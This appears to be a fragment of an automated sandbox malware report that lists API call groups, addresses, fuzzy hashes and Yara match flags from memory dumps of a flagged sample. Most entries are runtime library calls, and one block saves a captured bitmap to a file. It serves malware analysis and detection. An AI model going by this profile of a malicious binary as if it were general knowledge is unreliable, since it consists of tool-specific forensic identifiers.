                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0210C401
                                                                                                    • int.LIBCPMT ref: 0210C418
                                                                                                      • Part of subcall function 0210BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFD4
                                                                                                      • Part of subcall function 0210BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFEE
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0210C421
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0210C452
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0210C468
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0210C486
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction ID: 1a3ad20e8ab9a7a80a9c007c5124fa0bb48741aedff6b5080e56d41c2c4e4351
                                                                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction Fuzzy Hash: 2111CE729802289FCB14FBA4C884AEE7772BF44714F10461AE811AB2D0DFB48A05CFE5
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 02104E8C
                                                                                                    • int.LIBCPMT ref: 02104EA3
                                                                                                      • Part of subcall function 0210BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFD4
                                                                                                      • Part of subcall function 0210BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFEE
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 02104EAC
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 02104EDD
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 02104EF3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02104F11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction ID: 6a5e2fe5fd5a78cd624afc2b76240b00a9a7d8d1c5f49b98687b612a6cc13e18
                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction Fuzzy Hash: 45118E32D802299FCB15EBA4D884AEE7776BF44314F244519E510AB2E0DFB49A05CFD5
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                    • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID: fJ@
                                                                                                    • API String ID: 1836011271-3478227103
                                                                                                    • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                    • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                    • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                    • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                    • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                    • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                    • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pScheduler
                                                                                                    • API String ID: 3657713681-923244539
                                                                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_catchmake_shared
                                                                                                    • String ID: MOC$RCC$v)D
                                                                                                    • API String ID: 3472968176-3108830043
                                                                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction ID: 11d534a336bea847d45502ee5f734b8150550470d76015ba6793bd5ee4885ac1
                                                                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction Fuzzy Hash: 5DF04F71A80564DFDF1AFF65C40066C3765AF1AB04F468091F54C6B2A0CF785A89CFA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                    • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                    • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                    • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                    • Instruction ID: a7180eb9d28209294d97313bf3f9b0094cf8c547855c1e588263681c1dcdb287
                                                                                                    • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                    • Instruction Fuzzy Hash: 3871C4319886769FCB258F54C884BBFBB79FF4531CF584629F4119B180DB708A69CBA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    • _free.LIBCMT ref: 00430B4F
                                                                                                    • _free.LIBCMT ref: 00430B66
                                                                                                    • _free.LIBCMT ref: 00430B85
                                                                                                    • _free.LIBCMT ref: 00430BA0
                                                                                                    • _free.LIBCMT ref: 00430BB7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3033488037-0
                                                                                                    • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                    • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                    • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                    • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3033488037-0
                                                                                                    • Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                                                                    • Instruction ID: 58fbb322d93eecebad4df48d6fcb5abcfb9b1c4a837f8ccb764140701ae2e1c2
                                                                                                    • Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                                                                    • Instruction Fuzzy Hash: E251B371A80704AFDB26DF29DC41B6AB7F6EF48724F144569E809D7650E732EA01CB84
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction ID: 38d2ef9fbe312d991b04595588c3514d2dfb97ddcbab695d75672a5eb415b6f0
                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction Fuzzy Hash: B641D136E40304AFCB15DF78C980A5DB7F6EF89714B1945A9D919EB391D731E901CB80
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                    • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                    • __freea.LIBCMT ref: 0043698E
                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 313313983-0
                                                                                                    • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                    • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                    • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                    • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                    APIs
                                                                                                    • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                      • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                    • List.LIBCMT ref: 0041AFB4
                                                                                                    • List.LIBCMT ref: 0041AFC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3281396844-0
                                                                                                    • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                    • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                    • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                    • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                    APIs
                                                                                                    • _SpinWait.LIBCONCRT ref: 0211B152
                                                                                                      • Part of subcall function 02111188: _SpinWait.LIBCONCRT ref: 021111A0
                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0211B166
                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0211B198
                                                                                                    • List.LIBCMT ref: 0211B21B
                                                                                                    • List.LIBCMT ref: 0211B22A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3281396844-0
                                                                                                    • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                    • Instruction ID: 507f33fff292b2a08737387e78475e3122dc0f7bd4ac17b293240116248f3d5b
                                                                                                    • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                    • Instruction Fuzzy Hash: DA316831D89656EFCB14EFA4E9906EDFBB2BF05308F06017AC81167641CB316A18CF90
                                                                                                    APIs
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                    • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                    • String ID:
                                                                                                    • API String ID: 2357751836-0
                                                                                                    • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                    • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                    • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                    • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                    APIs
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 021050A3
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 021050B7
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 0210511C
                                                                                                    • __Getcoll.LIBCPMT ref: 0210512B
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0210513B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                    • String ID:
                                                                                                    • API String ID: 2395760641-0
                                                                                                    • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                    • Instruction ID: ce3b92b2bd4f6f3c0464980d54f40f05ddb1766b719f4f41433f89a0bc7d3b75
                                                                                                    • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                    • Instruction Fuzzy Hash: 1C218972894208EFDB10EFA4C494BDCBBB2BF54715F50851AE485AB2C0DBB49944CF95
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                    • String ID:
                                                                                                    • API String ID: 4266703842-0
                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                    APIs
                                                                                                      • Part of subcall function 021129A4: TlsGetValue.KERNEL32(?,?,02110DC2,02112ECF,00000000,?,02110DA0,?,?,?,00000000,?,00000000), ref: 021129AA
                                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02117BB1
                                                                                                      • Part of subcall function 0212121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02121241
                                                                                                      • Part of subcall function 0212121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0212125A
                                                                                                      • Part of subcall function 0212121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021212D0
                                                                                                      • Part of subcall function 0212121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021212D8
                                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02117BBF
                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02117BC9
                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02117BD3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02117BF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                    • String ID:
                                                                                                    • API String ID: 4266703842-0
                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction ID: 257fbb7be6e4fb9b9bb5382470e099b8a63baffe567df62c68c503f07d853ec3
                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction Fuzzy Hash: 83F0F635A8022C6FCE25F775C82096DF6279F80B14B10417AE81053290DF359E168ED6
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00439E5D
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 00439E6F
                                                                                                    • _free.LIBCMT ref: 00439E81
                                                                                                    • _free.LIBCMT ref: 00439E93
                                                                                                    • _free.LIBCMT ref: 00439EA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
